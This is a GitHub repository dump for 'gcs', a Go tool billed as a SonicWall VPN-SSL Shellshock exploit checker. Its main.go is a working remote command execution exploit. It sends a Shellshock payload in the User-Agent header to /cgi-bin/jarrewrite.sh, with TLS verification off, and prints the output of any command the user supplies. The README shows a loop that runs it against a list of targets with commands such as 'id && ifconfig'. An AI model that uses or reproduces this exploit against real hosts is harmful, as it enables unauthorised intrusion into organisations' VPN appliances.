├── 1.svg ├── README.md ├── gcs.png └── main.go /1.svg: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 9 | 10 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # gcs 2 | SonicWall VPN-SSL Exploit Checker* using Golang ( * and other targets vulnerable to shellshock ). 3 | 4 | # Install 5 | ``` 6 | ▶ go get -v github.com/gustavorobertux/gcs 7 | ``` 8 | # Basic Usage 9 | ### oneliner 10 | ``` 11 | ▶ for i in $(cat list.txt) ; do echo $i | xargs gcs -i ; done 12 | ``` 13 | ### Simple command - Default -c echo 14 | ``` 15 | ▶ gcs -i x.x.x.x 16 | ``` 17 | ### With commands 18 | ``` 19 | ▶ gcs -i x.x.x.x -c id 20 | ▶ gcs -i x.x.x.x -c 'id && ifconfig' 21 | ``` 22 | # Screenshot 23 |

24 | -------------------------------------------------------------------------------- /gcs.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gustavorobertux/gcs/6501cd6db4946697ae5d1d74bfa89e75373f7a3c/gcs.png -------------------------------------------------------------------------------- /main.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "crypto/tls" 5 | "flag" 6 | "fmt" 7 | "io/ioutil" 8 | "log" 9 | "net/http" 10 | 11 | "github.com/gookit/color" 12 | ) 13 | 14 | func main() { 15 | 16 | ipPtr := flag.String("i", "", "target ip") 17 | cmdPtr := flag.String("c", "echo", "Commands: e.g ifconfig, id, etc.") 18 | 19 | flag.Parse() 20 | 21 | tr := &http.Transport{ 22 | TLSClientConfig: &tls.Config{InsecureSkipVerify: true}, 23 | } 24 | 25 | client := &http.Client{Transport: tr} 26 | 27 | req, err := http.NewRequest("GET", "https://"+*ipPtr+"/cgi-bin/jarrewrite.sh", nil) 28 | if err != nil { 29 | 30 | } 31 | 32 | req.Host = *ipPtr 33 | req.Header.Set("User-Agent", "() { :; }; echo ; /bin/bash -c '"+*cmdPtr+"'") 34 | req.Header.Set("Connection", "close") 35 | req.Header.Set("Accept", "*/*") 36 | req.Header.Set("Accept-Language", "en") 37 | req.Header.Set("Accept-Encoding", "gzip, deflate") 38 | 39 | resp, err := client.Do(req) 40 | if err != nil { 41 | color.Red.Println(*ipPtr, " [NOT VULNERABLE] ") 42 | return 43 | } else { 44 | color.Green.Print(*ipPtr, " [VULNERABLE] ") 45 | } 46 | 47 | defer resp.Body.Close() 48 | 49 | body, err := ioutil.ReadAll(resp.Body) 50 | if err != nil { 51 | log.Fatalln(err) 52 | } 53 | fmt.Printf("%s\n", body) 54 | } 55 | --------------------------------------------------------------------------------